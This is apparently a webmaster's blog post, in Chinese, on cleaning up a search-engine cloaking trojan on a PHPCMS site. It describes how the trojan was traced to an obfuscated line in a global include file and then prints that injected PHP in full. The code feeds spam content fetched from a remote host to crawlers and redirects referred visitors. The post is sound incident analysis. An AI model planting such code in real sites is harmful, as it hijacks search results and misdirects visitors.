公司的网站被挂马了,使用的方法是我还没有找到原因,但大概的原理是在网站的全局加入了全局代码或者函数,自动判断来访的是搜索引擎的蜘蛛还是普通的浏览器访问,如果是蜘蛛,自动返回一段新添加的代码,如果是浏览器则自动载入原网页。
我现在没有找出原因的问题是,一网站程序使用的是PHPCMS,我不是很熟悉,不知道全局代码如何调用的?二,之前没有接触过这样的黑网站方式,只是看过一两篇文章,不知道是在空间放置文件,还是在网站放置木马文件。三,这个网站不是我来搭建的,很多文件、文件夹不知道原有的还是被添加的。。。。
但是可以看到被挂马的表现是:在google site收录中,出现了很多外部内容页面,点击进入后仍显示原网页内容。通过一些模拟蜘蛛访问的站长工具访问该页面,则可以看到那些被挂的代码。
谷歌搜索引擎模拟访问工具:
被挂搜索引擎木马现象:
一些页面和目录(粗略来看都是PHP文件)出现了被黑的现象:在谷歌的收录结果可以看到页面标题和内容是一些DNF的内容,打开页面却还显示正常的网页内容,用搜索引擎模拟工具可以发现网页载入的是一些乱七八糟的DNF论坛的帖子什么的。
但是在网站根目录没有找到奇怪的类似黑客的文件(本来网站文件较多,目录也很多)
网上被这种黑的网站有很多:?wd=%E6%89%93%E6%8B%9B%E5%91%BC%E5%8F%91%E6%B6%88%E6%81%AF%20gyckr&pn=10&ie=utf-8&rsv_page=1
表面看起来都没有问题,但用搜索引擎模拟工具一看就完全不是网站的内容了。被这种类型的网站挂黑 的 基本都不能被搜索引擎收录快照
原因分析:
通过服务端的全局变量获取到上一个的访问地址的url也就是来源url。搜索引擎木马劫持就是利用这个,如果来访者是正常的人。那么就直接正常的跳转,如果来访者是蜘蛛,那么就利用302跳转(也不一定,反正就是载入非正常内容)到指定的url,那么蜘蛛就爬去的是指定url的内容,所以搜索引擎里面看到的内容和你的站点完全不相干。
排查分析:
搜索引擎木马一般是修改了网站的全局变量,因此注意排查那些出问题的页面调用的全局变量。或者可以进行关键词搜索:比如搜索百度蜘蛛、谷歌蜘蛛的英文名(baidu/baiduspider、google)。
我选择的是变量查找,实际的结果显示确实存在关键词,包括baidu google soso 还有DNF等,涛涛电脑知识网,但是这些关键词都被base64加密了,直接搜索是搜索不到的。
接着说如何进行变量查找,正常的php文件一般会调用一个总的全局文件,文件名一般为common.php, common.inc.php等等之类,打开这样的全局变量文件,仔细查看发现不正常的地方,文件最下方被加入了一行加密代码。要仔细看,涛涛电脑知识网,看不到就用软件对比看。有一行的区别,打开自动分行则可以看到一大堆代码。
这一行代码就是黑客加的代码了,一般会被进行各种加密的,我看到这一行就被进行了base64和ROT13加密。base64解码的工具网上一大堆,rot13编码和解码的工具:
问题到此本该水落石出,其实我还是没有搞懂,虽然用那些DNF的内容引导了蜘蛛,可是新载入的DNF内容中并没有直接链接,并不会链接到目标论坛去,只会在被黑的网站里打转转。这样对黑客搞这个站有什么意义呢???待解答。
不过我还没有找到黑客加码的途径,一般情况下是网站有漏洞,建议各位及时打补丁。目前,这样的搜索引擎木马可以在discuz,phpcms等主流PHP程序上实现。
被挂的源代码
error_reporting (E_ERROR);$neegcc = $_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')];$jaaemfenekcoic = $_SERVER[base64_decode('UkVNT1RFX0FERFI=')];$bdohecifofdmlboddcballfiobig = $_SERVER[base64_decode('SFRUUF9SRUZFUkVS')];$gfhhjhanjidinhgjjfnmiamelcnld = $_SERVER[base64_decode('SFRUUF9IT1NU')];$mgfmkohfbgbngjl = $_SERVER[base64_decode('UkVRVUVTVF9VUkk=')];$eiebkhmda = base64_decode(str_rot13(‘LzWmYaycrzuiozphnJ5zomb1AGH1′));$eljdmgag = base64_decode(str_rot13(‘Y3g2LKW9Y2yhMTI4YaObpN==’));$lickmek = base64_decode(str_rot13(‘Y3g2LKW9Y2yhMTI4YaE4qN==’));$begbeknkamokonec = array(base64_decode(‘ZG5m’) => base64_decode(‘ZG5mfERORg==’),base64_decode(‘ZG5m’) => base64_decode(‘JUI1JUQ4JUNGJUMyJUIzJUM3fCVFNSU5QyVCMCVFNCVCOCU4QiVFNSU5RiU4RQ==’));$kbbgkkecklglhdoikae = array(base64_decode(”),base64_decode(‘Lw==’),base64_decode(‘L2ZvcnVtLnBocA==’),base64_decode(‘L2hvbWUucGhw’),base64_decode(‘L2luZGV4LnBocA==’),base64_decode(‘L3BvcnRhbC5waHA=’));$feeimmlfjiaeamfnibeldle = array(base64_decode(‘TWF4dGhvbg==’),base64_decode(‘RmlyZWZveA==’));$igaeoddhnembemichicil = array(base64_decode(‘MTI1LjkwLjkzLg==’),base64_decode(‘MTI3LjAuMC4=’),base64_decode(‘MTkyLjE2OC4xLg==’));$llijghbliimhohebl = array(base64_decode(‘YmFpZHU=’),base64_decode(‘Z29vZ2xl’),base64_decode(‘c29zbw==’),base64_decode(‘c29nb3U=’),base64_decode(‘eWFob28=’),base64_decode(‘YmluZw==’),base64_decode(‘eW91ZGFv’));$lcahbkhokdnjhbfdja = array(base64_decode(‘c2l0ZSUzQQ==’),base64_decode(‘aW51cmwlM0E=’));$ljkhmankkgdcghbkljibhk = array_keys($_GET);$doagnjooadjbnkcffmji = array_keys($begbeknkamokonec);$fddfdbodkhbniffakfjhdlhdjlfkehkjl = base64_decode(‘eDEyOA==’);$kgbfdmijalnnigedhcibfmhcblecdea = explode(base64_decode(‘Lg==’),$gfhhjhanjidinhgjjfnmiamelcnld);$nlbdoomjajincadghfailmboonecbico = count($kgbfdmijalnnigedhcibfmhcblecdea);if($nlbdoomjajincadghfailmboonecbico > 2) {$gfhhjhanjidinhgjjfnmiamelcnld = $kgbfdmijalnnigedhcibfmhcblecdea[$nlbdoomjajincadghfailmboonecbico-3].base64_decode(‘Lg==’).$kgbfdmijalnnigedhcibfmhcblecdea[$nlbdoomjajincadghfailmboonecbico-2].base64_decode(‘Lg==’).$kgbfdmijalnnigedhcibfmhcblecdea[$nlbdoomjajincadghfailmboonecbico-1];}$fgboacglhlabjnmahfalgnce = $gdjdhgimmjmnlejeakfkidkaj = $imlc = false;foreach($begbeknkamokonec as $ckhhe => $bcegihifak) {$ljm = explode(base64_decode(‘fA==’),$bcegihifak);foreach($ljm as $amakbmffjlf) {if(stristr($bdohecifofdmlboddcballfiobig,$amakbmffjlf)){$imlc = $ckhhe; $gdjdhgimmjmnlejeakfkidkaj = true; break;}}if(in_array($ckhhe,$ljkhmankkgdcghbkljibhk)) {$imlc = $ckhhe; $gdjdhgimmjmnlejeakfkidkaj = true;}if($gdjdhgimmjmnlejeakfkidkaj) {break;}}foreach($lcahbkhokdnjhbfdja as $dijkcokmoimkj) {if(stristr($bdohecifofdmlboddcballfiobig,$dijkcokmoimkj)){$gdjdhgimmjmnlejeakfkidkaj = false; break;}}foreach($feeimmlfjiaeamfnibeldle as $oooaodkhejakobgflnihfmbbcmgjhbfgbf) {if(stristr($neegcc,$oooaodkhejakobgflnihfmbbcmgjhbfgbf)){$gdjdhgimmjmnlejeakfkidkaj = false; break;}}foreach($llijghbliimhohebl as $abnfdjnannca) {if(stristr($neegcc,$abnfdjnannca)){$fgboacglhlabjnmahfalgnce = true; break;}}foreach($igaeoddhnembemichicil as $kmajofbdoekfnidhfcejlikhof) {if(stristr($jaaemfenekcoic,$kmajofbdoekfnidhfcejlikhof)){$gdjdhgimmjmnlejeakfkidkaj = false; $fgboacglhlabjnmahfalgnce = false; break;}}if($fgboacglhlabjnmahfalgnce && (!in_array($mgfmkohfbgbngjl,$kbbgkkecklglhdoikae))) {if(!$imlc) {$imlc = $doagnjooadjbnkcffmji[array_rand($doagnjooadjbnkcffmji)];}header(base64_decode(‘Y29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9Z2IyMzEy’));$gdklldfddemlhgkamfjddgmddbagam = file_get_contents (base64_decode(‘aHR0cDovLw==’).$eiebkhmda.str_replace(base64_decode(‘e3Zhcn0=’),$imlc,$eljdmgag).base64_decode(‘P2Q9′).$gfhhjhanjidinhgjjfnmiamelcnld.base64_decode(‘JnI9′).bin2hex($mgfmkohfbgbngjl));$acbamlnmgnchbcmmikfmdkohfla = explode(base64_decode(‘WzB4U3BpZGVyXQ==’),$gdklldfddemlhgkamfjddgmddbagam);echo $acbamlnmgnchbcmmikfmdkohfla[1];exit;} elseif($gdjdhgimmjmnlejeakfkidkaj && $imlc && empty($_COOKIE[$fddfdbodkhbniffakfjhdlhdjlfkehkjl])) {setcookie($fddfdbodkhbniffakfjhdlhdjlfkehkjl,$gfhhjhanjidinhgjjfnmiamelcnld,time() + 259200);$gdklldfddemlhgkamfjddgmddbagam = file_get_contents (base64_decode(‘aHR0cDovLw==’).$eiebkhmda.str_replace(base64_decode(‘e3Zhcn0=’),$imlc,$lickmek));header(base64_decode(‘TG9jYXRpb246IA==’).base64_decode(str_rot13($gdklldfddemlhgkamfjddgmddbagam)).base64_decode(‘Iw==’).str_replace(base64_decode(‘Lg==’),base64_decode(‘Xw==’),$gfhhjhanjidinhgjjfnmiamelcnld));exit;}
解码后的代码
